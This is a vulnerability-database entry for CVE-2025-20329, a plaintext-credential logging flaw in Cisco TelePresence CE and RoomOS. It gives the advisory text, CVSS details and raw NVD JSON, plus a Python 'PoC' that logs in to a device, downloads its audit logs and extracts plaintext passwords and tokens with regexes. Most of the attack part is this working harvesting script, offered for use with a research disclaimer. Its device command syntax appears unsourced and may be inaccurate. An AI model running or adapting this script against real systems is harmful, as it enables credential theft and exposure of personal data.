Security Vulnerability Report
中文
CVE-2025-20329 CVSS 4.9 MEDIUM

CVE-2025-20329

Published: 2025-10-15 17:15:49
Last Modified: 2025-12-01 18:13:27
Source: [email protected]

Description

A vulnerability in the logging component of Cisco TelePresence Collaboration Endpoint (CE) and Cisco RoomOS Software could allow an authenticated, remote attacker to view sensitive information in clear text on an affected system. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability exists because certain unencrypted credentials are stored when SIP media component logging is enabled. An attacker could exploit this vulnerability by accessing the audit logs on an affected system and obtaining credentials to which they may not normally have access. A successful exploit could allow the attacker to use those credentials to access confidential information, some of which may contain personally identifiable information (PII). Note: To access the logs that are stored in the Webex Cloud or stored on the device itself, an attacker must have valid administrative credentials.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:cisco:telepresence_collaboration_endpoint:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:cisco:roomos:*:*:*:*:*:*:*:* - VULNERABLE
Cisco TelePresence Collaboration Endpoint (CE) Software - 受影响版本需参考Cisco官方安全公告
Cisco RoomOS Software - 受影响版本需参考Cisco官方安全公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-20329 PoC - Cisco TelePresence CE/RoomOS Credential Disclosure # This PoC demonstrates how to extract plaintext credentials from audit logs # Note: Requires valid administrative credentials to access the logs import requests import re import sys from urllib.parse import urljoin class CiscoRoomOSExploit: """ PoC for CVE-2025-20329: Information Disclosure via SIP Media Component Logging Affected: Cisco TelePresence CE and RoomOS Software """ def __init__(self, target, username, password): self.target = target # e.g., https://<device-ip> self.username = username self.password = password self.session = requests.Session() self.session.verify = False def authenticate(self): """Authenticate to the Cisco RoomOS device with admin credentials""" login_url = urljoin(self.target, "/putxml") auth_xml = f"""<?xml version="1.0" encoding="UTF-8"?> <Command xmlns=""> <Authentication> <Username>{self.username}</Username> <Password>{self.password}</Password> </Authentication> </Command>""" try: resp = self.session.post(login_url, data=auth_xml, headers={"Content-Type": "application/xml"}) if resp.status_code == 200 and "AuthenticationReply" in resp.text: print("[+] Authentication successful") return True else: print("[-] Authentication failed") return False except Exception as e: print(f"[-] Connection error: {e}") return False def fetch_audit_logs(self): """Fetch audit logs from the device or Webex Cloud""" # Access the audit logs endpoint log_url = urljoin(self.target, "/putxml") log_query = """<?xml version="1.0" encoding="UTF-8"?> <Command xmlns=""> <Audit> <Log> <Get> <All/> </Get> </Log> </Audit> </Command>""" try: resp = self.session.post(log_url, data=log_query, headers={"Content-Type": "application/xml"}) if resp.status_code == 200: print("[+] Audit logs retrieved successfully") return resp.text else: print(f"[-] Failed to retrieve logs: {resp.status_code}") return None except Exception as e: print(f"[-] Error fetching logs: {e}") return None def extract_credentials(self, log_content): """Extract plaintext credentials from log content""" # Pattern to match credentials stored in plaintext due to SIP media logging credential_patterns = [ r'(?i)sip[\s_-]?media[\s_-]?(?:password|credential|auth)["\s:=]+([\w@./+-]+)', r'(?i)password["\s:=]+"([^"]+)"', r'(?i)credential["\s:=]+"([^"]+)"', r'(?i)auth[\s_-]?token["\s:=]+"([^"]+)"' ] credentials = [] for pattern in credential_patterns: matches = re.findall(pattern, log_content) for match in matches: credentials.append(match) print(f"[!] Found credential: {match}") return credentials def exploit(self): """Main exploit chain""" print(f"[*] Targeting: {self.target}") print(f"[*] CVE-2025-20329 - Credential Disclosure via SIP Media Logging") # Step 1: Authenticate with admin credentials if not self.authenticate(): print("[-] Cannot proceed without valid admin credentials") sys.exit(1) # Step 2: Fetch audit logs logs = self.fetch_audit_logs() if not logs: print("[-] No logs retrieved") sys.exit(1) # Step 3: Extract plaintext credentials print("[*] Searching for plaintext credentials in logs...") creds = self.extract_credentials(logs) if creds: print(f"\n[+] Exploit successful! Found {len(creds)} credential(s)") print("[+] Attacker can now use these credentials to access confidential data") else: print("[-] No credentials found in logs") if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: {sys.argv[0]} <target_url> <admin_user> <admin_password>") print(f"Example: {sys.argv[0]} https://192.168.1.100 admin password123") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] exploit = CiscoRoomOSExploit(target, username, password) exploit.exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20329", "sourceIdentifier": "[email protected]", "published": "2025-10-15T17:15:48.697", "lastModified": "2025-12-01T18:13:26.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the logging component of Cisco TelePresence Collaboration Endpoint (CE) and Cisco RoomOS Software could allow an authenticated, remote attacker to view sensitive information in clear text on an affected system. To exploit this vulnerability, the attacker must have valid administrative&nbsp;credentials.\r\n\r\nThis vulnerability exists because certain unencrypted credentials are stored when SIP media component logging is enabled. An attacker could exploit this vulnerability by accessing the audit logs on an affected system and obtaining credentials to which they may not normally have access. A successful exploit could allow the attacker to use those credentials to access confidential information, some of which may contain personally identifiable information (PII).\r\nNote: To access the logs that are stored in the Webex Cloud or stored on the device itself, an attacker must have valid administrative credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cisco:telepresence_collaboration_endpoint:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0.0", "versionEndIncluding": "9.15.18.5", "matchCriteriaId": "61A07A6D-5679-470C-A18E-4A812E38AA22"}, {"vulnerable": true, "criteria": "cpe:2.3:o:cisco:roomos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0.0", "versionEndExcluding": "11.32.2.1", "matchCriteriaId": "7A8C28FB-9D5B-4696-A5FF-9778ED75A018"}]}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-roomos-inf-disc-qGgsbxAm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.